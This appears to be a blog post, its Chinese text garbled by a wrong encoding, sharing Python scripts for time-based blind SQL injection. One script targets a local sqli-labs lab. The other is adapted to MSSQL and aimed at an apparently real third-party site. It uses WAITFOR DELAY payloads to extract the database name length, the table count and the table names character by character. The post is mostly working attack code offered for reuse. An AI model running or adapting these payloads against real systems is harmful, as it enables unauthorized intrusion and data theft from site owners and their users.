I"‘<p>é‡åˆ°è¿‡ä¸€ä¸ª mssql æ—¶é—´ç›²æ³¨çš„ç«™ï¼Œè¦è„šæœ¬è·‘ï¼Œç½‘ä¸Šæ‰¾äº†ä¸€ä»½ï¼ŒMySQL çš„ï¼Œæ‹¿è¿‡æ¥è‡ªå·±æ”¹äº†æ”¹ï¼Œå¯ä»¥è·‘ï¼Œä½†æ˜¯æ²¡æœ‰æ•´ç†ï¼Œå…ˆæ”¾è¿™ï¼Œä¸‹æ¬¡å†è¦ç”¨ä¸€èµ·æ•´ç†ä¸€ä¸‹ã€‚</p>

<p>åŸæœ¬çš„ä»£ç ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import requests
import time

headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'}
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'
database = ''
global length
for l in range(1,20):
    Url = 'http://192.168.10.128/sqli-labs-master/Less-6/?id=1" and if(length(database())&gt;{0},1,sleep(3))--+'
    UrlFormat = Url.format(l)      #formatï¼ˆï¼‰å‡½æ•°ä½¿ç”¨
    start_time0 = time.time()       #å‘é€è¯·æ±‚å‰çš„æ—¶é—´èµ‹å€¼
    requests.get(UrlFormat,headers=headers)
    if  time.time() - start_time0 &gt; 2:  #åˆ¤æ–­æ­£ç¡®çš„æ•°æ®åº“é•¿åº¦
            print('database length is ' + str(l))
            global length 
            length = l  #æŠŠæ•°æ®åº“é•¿åº¦èµ‹å€¼ç»™å…¨å±€å˜é‡
            break
    else:
        pass
for i in range(1,length+1):
    for char in chars:
        charAscii = ord(char) #charè½¬æ¢ä¸ºascii
        url = 'http://192.168.10.128/sqli-labs-master/Less-6/?id=1" and if(ascii(substr(database(),{0},1))&gt;{1},1,sleep(3))--+'
        urlformat = url.format(i,charAscii)
        start_time = time.time()
        requests.get(urlformat,headers=headers)
        if  time.time() - start_time &gt; 2:
            database+=char
            print('database: ',database)
            break
        else:
            pass
print('database is ' + database)

</code></pre></div></div>

<p>æˆ‘è·‘çš„ä»£ç ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># -*- coding: utf-8 -*-
# é»˜è®¤ mssql è¯­æ³•




import requests
import time

# http://www.xixih.net/health.aspx?pos=21 if(ascii(substring(db_name(),1,1)))&gt;1 waitfor delay '0:0:5'--


headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'}
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'
database = ''
# global length


# 
# 
# ç¬¬ä¸€æ­¥è·å–æ•°æ®åº“é•¿åº¦
# 
# 
# 
# for l in range(1,13):
#     #MySQLè¯­æ³• Url = 'http://192.168.10.128/sqli-labs-master/Less-6/?id=1" and if(length(database())&gt;{0},1,sleep(3))--+'

#     Url = "http://www.xixih.net/health.aspx?pos=21 if(len(db_name()))={0} waitfor delay '0:0:2'--+"

#     UrlFormat = Url.format(l) 

#     print('l', l)     #formatï¼ˆï¼‰å‡½æ•°ä½¿ç”¨
#     print('UrlFormat', UrlFormat)     #formatï¼ˆï¼‰å‡½æ•°ä½¿ç”¨
#     start_time0 = time.time()  		#å‘é€è¯·æ±‚å‰çš„æ—¶é—´èµ‹å€¼
#     requests.get(UrlFormat,headers=headers)
#     if  time.time() - start_time0 &gt; 2:	#åˆ¤æ–­æ­£ç¡®çš„æ•°æ®åº“é•¿åº¦
#             print('database length is ' + str(l))
#             global length 
#             length = l	#æŠŠæ•°æ®åº“é•¿åº¦èµ‹å€¼ç»™å…¨å±€å˜é‡
#             break
#     else:
#         pass

# 
# 
#ç¬¬äºŒæ­¥ è·å–æ•°æ®åº“åç§°
# 
# 
# 
# length = 6
# for i in range(1, length+1):
#     for char in chars:
#         charAscii = ord(char) #charè½¬æ¢ä¸ºascii
#         url = "http://www.xixih.net/health.aspx?pos=21 if(ascii(substring(db_name(),{0},1)))={1} waitfor delay '0:0:2'--+"
#         #MySQLè¯­æ³•ï¼š url = 'http://192.168.10.128/sqli-labs-master/Less-6/?id=1" and if(ascii(substr(database(),{0},1))&gt;{1},1,sleep(3))--+'
#         urlformat = url.format(i,charAscii)
#         start_time = time.time()
#         requests.get(urlformat,headers=headers)
#         if  time.time() - start_time &gt; 2:
#             database+=char
#             print('database: ',database)
#             break
#         else:
#             pass

# 
# 
# ç¬¬ä¸‰æ­¥è·å–è¡¨ä¸ªæ•°ï¼ŒåŸºæœ¬å’Œè·å–æ•°æ®åº“é•¿åº¦ä¸€æ ·
# 
# 
# 
global length
for l in range(1,30):

    # Url = "http://www.xixih.net/health.aspx?pos=21 if(len(db_name()))={0} waitfor delay '0:0:2'--+"
    Url = "http://www.xixih.net/health.aspx?pos=21 if((select count(*) from SysObjects where xtype='u')={0}) WAITFOR DELAY '0:0:2'--+"

    UrlFormat = Url.format(l) 

    print('l', l)     #formatï¼ˆï¼‰å‡½æ•°ä½¿ç”¨
    print('UrlFormat', UrlFormat)     #formatï¼ˆï¼‰å‡½æ•°ä½¿ç”¨
    start_time0 = time.time()         #å‘é€è¯·æ±‚å‰çš„æ—¶é—´èµ‹å€¼
    requests.get(UrlFormat,headers=headers)
    if  time.time() - start_time0 &gt; 2:    #åˆ¤æ–­æ­£ç¡®çš„æ•°æ®åº“é•¿åº¦
            print('table has ' + str(l))
            global length 
            length = l    #æŠŠæ•°æ®åº“é•¿åº¦èµ‹å€¼ç»™å…¨å±€å˜é‡
            break
    else:
        pass
# print('database is ' + database)
print('length is ')
print(length)

# 
# 
# ç¬¬å››æ­¥éå†æ¯å¼ è¡¨ï¼Œè·å–æ¯ä¸ªè¡¨çš„é•¿åº¦åå†è·å–è¡¨å
# 
# 
# 
# 23å¼ è¡¨
# global length
# for k in range(1, 24):
    # for l in range(1,20):
    #     Url = "http://www.xixih.net/health.aspx?pos=21 if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u') and len(name)={1})={0}) WAITFOR DELAY '0:0:2'--+"
    #     # if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u') and len(name)=9)=1)
    #     UrlFormat = Url.format(l,k)      #formatï¼ˆï¼‰å‡½æ•°ä½¿ç”¨
    #     start_time0 = time.time()       #å‘é€è¯·æ±‚å‰çš„æ—¶é—´èµ‹å€¼
    #     requests.get(UrlFormat,headers=headers)
    #     if  time.time() - start_time0 &gt; 2:  #åˆ¤æ–­æ­£ç¡®çš„æ•°æ®åº“é•¿åº¦
    #             print('database length is ' + str(l))
    #             global length 
    #             length = l  #æŠŠæ•°æ®åº“é•¿åº¦èµ‹å€¼ç»™å…¨å±€å˜é‡
    #             break
    #     else:
    #         pass
for k in range(1, 24):
    database = ''
    for i in range(1,21):
        for char in chars:
            charAscii = ord(char) #charè½¬æ¢ä¸ºascii
            url = "http://www.xixih.net/health.aspx?pos=21 if((select count(*) from SysObjects where name in (select top {0} name from SysObjects where xtype='u') and ascii(substring(name,{1},1))={2})=1) WAITFOR DELAY '0:0:2'--+"
            # url = "http://www.xixih.net/health.aspx?pos=21 if((select count(*) from SysObjects where name in (select top 5 name from SysObjects where xtype='u') and ascii(substring(name,{0},1))={1})=1) WAITFOR DELAY '0:0:2'--+"
            # if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u') and ascii(substring(name,1,1))&amp;gt;90)=1) WAITFOR DELAY '0:0:5'--
            urlformat = url.format(k,i,charAscii)
            # urlformat = url.format(i,charAscii)
            start_time = time.time()
            requests.get(urlformat,headers=headers)
            if  time.time() - start_time &gt; 2:
                database+=char
                print('database: ',database)
                break
            else:
                pass
    print('database is ' + database)
</code></pre></div></div>
:ET